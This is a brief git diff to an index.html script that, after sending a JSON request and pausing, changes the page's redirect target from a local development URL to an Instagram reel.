--- a/index.html
+++ b/index.html
@@ -105,7 +105,7 @@
     }
     request.send(JSON.stringify(params));
 	sleep(400)
-	window.location.replace("http://127.0.0.1:5500/index.html");
+	window.location.replace("https://www.instagram.com/reel/Cz8tp1OtugN/");
   }
   </script>
 </body>
